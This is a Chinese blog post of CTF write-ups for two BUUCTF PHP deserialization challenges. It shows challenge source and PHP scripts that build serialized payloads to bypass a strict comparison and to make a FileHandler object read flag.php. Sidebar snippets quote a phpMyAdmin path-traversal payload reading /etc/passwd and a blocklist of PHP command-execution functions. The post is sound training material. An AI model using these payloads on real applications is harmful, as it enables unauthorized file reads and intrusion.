php反序列化-BUUCTF刷题记录

已于 2023-01-03 15:27:12 修改
阅读量796 收藏 1
点赞数 1
分类专栏: CTF刷题记录 文章标签: php 开发语言 安全 web安全
于 2022-11-30 00:21:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53912233/article/details/128105583
版权

题目链接-BUU CODE REVIEW 1

信息收集

进入题目环境之后可以看见在页面展示了php代码,该代码核心主要是由两大部分组成的,那么一般把源代码给你的ctf题一般是绕过,然后传参之类的,最后通过各种姿势拿到flag
在这里插入图片描述

源码分析

我们先看第一部分较为关键的代码,可以清楚的看见要想获取flag,就必须要让BUU类对象的成员correct的变量恒等于input成员的变量
在这里插入图片描述
继续分析第二部分,可以看见这部分代码属于传参的判断语句,简单来说,你想要控制第一部分的成员变量的恒等于获得flag,就必须要从最后一个php语句的obj进行接受传参内容,前提是让以上的if条件的判断为真
在这里插入图片描述

解题

既让要获取flag,可以先进行构造payload序列化语句,然后再将payload传参进去obj可控变量里

引用绕过

在前面得知要想获取flag,必须恒等于相对应对象成员的变量,这里也不在解释了。我们根据这个思路尝试使用引号进行绕过恒等于,也就是当这个input变量什么都不给予时那么一定是恒等于correct空变量的赋值,然后对其类进行反序列化从而获取payload

<?php
class BUU {
   public $correct = "";
   public $input = "";
}

$a = new BUU();
$a->correct = "";
$a->input = &$a->correct;
echo serialize($a);

?>

在这里插入图片描述

弱数组绕过

难点主要是在md51和md52两个接受变量的MD5值必须恒等于,其它的只需要在相对应的请求方式进行变量传参进去即可,最后将序列化payload放入obj=后
在这里插入图片描述

序列化payload:O:3:“BUU”:2:{s:7:“correct”;s:0:“”;s:5:“input”;R:2;}

发送后获取flag
在这里插入图片描述

[网鼎杯 2020 青龙组]AreUSerialz

访问题目链接可以看见以下下代码

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

代码分析

可以看见最后一行的if判断语句是接受反序列化的传参是str

在这里插入图片描述
分析代码发现,获得flag可以通过file_get_contents这个函数包含flag.php文件
在这里插入图片描述
在这里插入图片描述

解题

编写payload的php代码,可以php在线运行或者本地运行,如下图

<?php

class FileHandler {

    public $op = 2;//数字型op变量,当为2时调用read自定义函数,从而获取flag.php的文件读取
    public $filename= "flag.php";
    #public $content;//加不加都可以
    }
$a = new FileHandler();
echo serialize($a);
?>

其中op变量为2是因为要调用read的自定义函数,注意2不能用双引号,否则代表字符型
在这里插入图片描述

PAYLOAD : ?str=O:11:“FileHandler”:2:{s:2:“op”;i:2;s:8:“filename”;s:8:“flag.php”;}

提交payload之后发现有[Resutl]的提示,尝试查看源代码获得flag值
在这里插入图片描述

在这里插入图片描述

[极客大挑战 2019]PHP:另一篇博客

结尾

有什么不会的,疑问的可以私信我或者留言在评论区,看到的话我都会回复

cike_y
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
php json与xml序列化/反序列化
10-26
WEB开发中,php对象的序列化与反序列化经常使用,比较主流的有json格式与xml格式的序列化与反序列化。今天我们就来看看是如何用的。
详解PHP序列化和反序列化原理
10-18
本篇文章给大家分享了下PHP反序列化漏洞系列之PHP序列化和反序列化原理的相关知识,有这方面需要的朋友参考学习下吧。
CTF php反序列化总结
m0_53567065的博客
11-17 4297
前言:本⼈⽔平不⾼,只能做⼀些类似收集总结这样的⼯作,本篇文章是我自己在学php反序列化写的一篇姿势收集与总结,有不对的地方欢迎师傅们批评指正~定义:序列化就是将对象转换成字符串。反序列化相反,数据的格式的转换对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。漏洞原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化的过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。常用魔术方法
BUUCTF-[极客大挑战 2019]PHP1
Monica的博客
09-27 3656
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
[BT]BUUCTF刷题第6天(3.24)
Bluetuan的博客
03-24 1094
打开网站是一个小游戏,根据题目提示得知需要找到网站的备份文件,这里使用dirsearch进行扫描(由于使用dirsearch自带的字典完整扫描一遍耗时过长,因此根据网上的题解我自己写了一个包含正确备份文件的字典,缩短扫描时间)返回状态码200,说明确实存在该文件,访问下载和打开class.php文件需要反序列化后的对象满足username === 'admin’且password = 100生成代码:user因为username和password。
BUUCTF REAL
A_dmin的博客
01-30 4279
BUUCTF REAL flag好像都在系统环境变量中,phpinfo中就能看见,,,, [PHP]XXE libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡 dom.php、SimpleXMLElement.php、simplexml_load_string.php均可触发XXE漏洞 payload: <?xml version="1.0" encoding="utf-...
BUUCTF——phpweb
weixin_45864041的博客
04-17 608
打开题目 可以看到页面上的时间每5秒刷新一次,所以我们直接抓包看页面的数据提交 由页面提交的两个参数可以看到,第一个func是函数名,第二个是传入函数的参数。 所以可以用php的readfile()函数读取index.php的源码。 <?php $disable_fun = array("exec","shell_exec","system","passthru", "proc_open","show_source","phpinfo","popen","dl","eval", "
BUUCTF(10.25-11.1)
qq_52988816的博客
11-23 3579
[GWCTF 2019]我有一个数据库 考点是phpmyadmin 进入该页面 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 先测试能不能用该数据库 payload ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 发现有回显后我们改成flag http://57a7979b-f822-4a63-8bcb-3e76fa076462.node4.buuoj.cn/phpmyadmin/?
BUUCTF-Real
weixin_43821278的博客
03-08 4843
BUUCTF-Real
php中序列化与反序列化详解
10-20
本文介绍了php中序列化与反序列化的相关知识。具有很好的参考价值,下面跟着小编一起来看下吧
详解php反序列化
10-15
主要介绍了php反序列化的相关知识,文中讲解非常细致,代码帮助各位更好的理解和学习,感兴趣的朋友可以了解下
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
主要介绍了0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸),本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
buuctf php
ANYOUZHEN的博客
05-24 277
根据提示,网站一个有备份,我们打开御剑,直接扫它,发现了/www.zip,打开 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->userna..
(wp)ctfweb-buu中php反序列化
qq_51862722的博客
07-12 838
(wp)ctfweb-buu中php反序列化 我的blog,欢迎来玩 前面整理过php反序列化的知识点。 1.[极客大挑战 2019]PHP 进入页面,根据提示,考虑备份导致源码泄露。 于是用扫描工具(ctfwscan)进行目录扫描,发现备份文件可以成功访问,如图 然后下载下来,打开,有五个文件: 尝试flag.php后不对,审计class.php和index.php,找到了可反序列化点 因为包含了class.php文件,所以审计class.php class中没有调用类,根据index中代码,.
BUUCTF--Reverse(1~10)
m0_59022585的博客
07-08 1321
exeinfope.exe查看文件,发现位数为32位,使用IDA32打开,Shift+F12找到flag。将脱壳后的文件用IDA32打开,Shift+F12寻到关键字符串,跳转到伪代码部分,分析代码得到flag。跳转到伪代码,分析代码并编写脚本爆破求出flag。exeinfope.exe查看文件,发现文件为带壳32位,使用FFI.exe进行脱壳。使用IDA64打开exe文件,再使用Shift+F12查看字符串,得到flag。exeinfope.exe查看文件为32位无壳,IDA32打开文件搜索字符串。
BUUCTF 22
qq_52431855的博客
02-05 321
知识点 XML实体注入漏洞 XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 详情可见https://www.freebuf.com/vuls/175451.html Unicod.
BUUCTF-[极客大挑战 2019]PHP
rumil的博客
06-29 193
通过第二个if控制语句,我们发现通过正则表达式过滤掉了flag,所有说file参数传入时,如果有flag出现就会被过滤掉,我们再根据下一句话,文件包含,我们尝试去获取useless.php 的源码,看是什么信息,再次构造payload。发现是网页的源码,经过分析可得,三个参数分别为text,file,password通过get方式进行传参,在if控制语句当中,设置text变量,并在文件当中读取数据,要等于welcome to the zjctf才会返回true。:私有的类成员则只能被其定义所在的类访问。
CTF题型 php反序列化进阶(1) php原生类 例题和总结
qq_39947980的博客
03-14 1232
题目环境:https://github.com/D0g3-Lab/i-SOON_CTF_2023/tree/main/web/easy_unserialize。(通过echo触发SplFileObject中的**__toString()**方法)复现环境:https://www.nssctf.cn/problem/3723。一般题目会用 foreach 遍历读取每一行输出flag内容。存在__toString,可以获取符合要求的第一个文件名。仅读取一行内容(完整内容配合php://filter)
什么是php序列化和反序列化
最新发布
05-08
PHP 中,序列化是指将一个 PHP 值转化为一个字符串(string)的过程,而反序列化则是将这个字符串还原为原始的 PHP 值。序列化后的字符串可以存储在文件中或通过网络传输,反序列化后可以重新恢复为 PHP 值。 PHP 提供了两个函数来实现序列化和反序列化:serialize() 和 unserialize()。serialize() 函数将 PHP 值序列化为一个字符串,而 unserialize() 函数则将字符串反序列化PHP 值。 序列化和反序列化Web 应用程序中经常用于存储和传输数据,例如在会话管理和缓存机制中。但需要注意的是,反序列化操作可能存在安全风险,因为攻击者可以构造恶意数据来触发代码执行,从而导致应用程序被攻击。因此,在进行反序列化操作时,应该谨慎处理数据来源和内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cike_y

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值